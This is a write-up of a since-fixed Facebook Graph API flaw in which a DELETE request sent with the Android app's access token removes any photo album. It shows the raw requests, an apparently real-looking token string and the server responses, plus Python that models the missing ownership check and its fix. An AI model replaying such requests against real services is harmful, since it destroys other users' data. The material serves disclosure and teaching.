This vulnerability, which Facebook has since fixed, allowed a malicious user to delete any photo album on Facebook. The flaw was in the Facebook Graph API: a single DELETE request was enough to remove any album owned by a user, a page or a group.

The main purpose of the Facebook Graph API is to let developers read and write user data; at this point every Facebook application uses it. Each Graph API call is authorized by an access token, which identifies both the user and the application making the request and therefore determines what the call may read or write.

According to Facebook's developer documentation, photo albums cannot be deleted through the album node of the Graph API.

Laxman Muthiyah, who found the bug, first confirmed that deleting an album is indeed not possible with an access token issued to the Graph API Explorer:

Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

But Laxman found that the very same DELETE succeeds when the request carries the access token of the official Facebook for Android app instead. Since the only thing in the request path is the album id, the request works against any album id, which is what made every album on Facebook deletable:

Request :-
DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=< Facebook_for_Android_Access_Token >

Response :-
true
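The two requests above, replayed against a small model of the server-side authorization logic. This is an added example, not Facebook's code and not part of Laxman's write-up. It assumes a capability table keyed by application (`APP_CAPABILITIES`) and a constructed album store; the only error text taken from the page is the #200 capability message, while the other error messages and the `Token`, `delete_album` and `replay` names are illustrative. The block also renders the raw DELETE request with a computed Content-Length and parses the `true` / error responses shown on the page.

```python
import json
from dataclasses import dataclass
from typing import Optional, Tuple

GRAPH_HOST = "graph.facebook.com"


def build_delete_request(node_id: str, access_token: str) -> str:
    """Render the raw HTTP/1.1 DELETE request from the write-up.

    The body is the url-encoded access_token, so Content-Length is derived
    from the body instead of being hard-coded.
    """
    body = f"access_token={access_token}"
    return (
        f"DELETE /{node_id} HTTP/1.1\r\n"
        f"Host: {GRAPH_HOST}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def parse_graph_response(body: str) -> Tuple[bool, Optional[int]]:
    """Classify a Graph API response body as (deleted, error_code).

    A successful delete is answered with the bare JSON literal `true`; a
    refusal is an {"error": {...}} object carrying a numeric "code".
    """
    data = json.loads(body)
    if data is True:
        return True, None
    if isinstance(data, dict) and "error" in data:
        return False, int(data["error"]["code"])
    raise ValueError(f"unexpected Graph API response: {body!r}")


@dataclass(frozen=True)
class Token:
    app: str   # application the token was issued to
    user: str  # user who authorized it


# Assumed capability table for the model (not Facebook's real configuration):
# the Graph API Explorer app lacks album deletion, the native Android app has it.
APP_CAPABILITIES = {
    "graph_explorer": frozenset(),
    "facebook_for_android": frozenset({"album.delete"}),
}


def _graph_error(code: int, message: str) -> dict:
    return {"error": {"message": f"(#{code}) {message}",
                      "type": "OAuthException", "code": code}}


def delete_album(node_id: str, token: Token, albums: dict, check_owner: bool):
    """Model of the server-side handler for DELETE /<album_id>.

    `albums` maps album id -> owner user id (a constructed store).  With
    check_owner=False the handler verifies only that the *application* may
    delete albums, which reproduces the behaviour in the write-up: any album
    id succeeds once the caller holds a capable token.  With check_owner=True
    it also requires the token's *user* to own the album.  Error texts other
    than the #200 capability message are assumptions.
    """
    if "album.delete" not in APP_CAPABILITIES.get(token.app, frozenset()):
        return _graph_error(200, "Application does not have the capability to make this API call.")
    if node_id not in albums:
        return _graph_error(100, "Unsupported delete request.")
    if check_owner and albums[node_id] != token.user:
        return _graph_error(200, "Permissions error: token user does not own this album.")
    del albums[node_id]
    return True


def replay(check_owner: bool) -> dict:
    """Send the write-up's two requests against the model and classify the answers."""
    victim_album = "518171421550249"           # album id from the write-up
    results = {}
    for name, token in (("graph_explorer", Token("graph_explorer", "attacker")),
                        ("facebook_for_android", Token("facebook_for_android", "attacker"))):
        store = {victim_album: "victim"}       # constructed: the album belongs to someone else
        wire = json.dumps(delete_album(victim_album, token, store, check_owner))
        results[name] = parse_graph_response(wire)
    return results


if __name__ == "__main__":
    print(build_delete_request("518171421550249", "<Facebook_for_Android_Access_Token>"))
    print("capability check only :", replay(check_owner=False))
    print("plus ownership check  :", replay(check_owner=True))
```

With `check_owner=False` the Android token deletes an album its user does not own, which is exactly the page's finding: the server answered the question "may this app delete albums?" but not "may this user delete this album?". The hardened path adds that object-level ownership check, so a capable application token on its own is no longer enough.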

You can see this Facebook vulnerability explained in the video below:

You can find more information regarding this vulnerability on this page.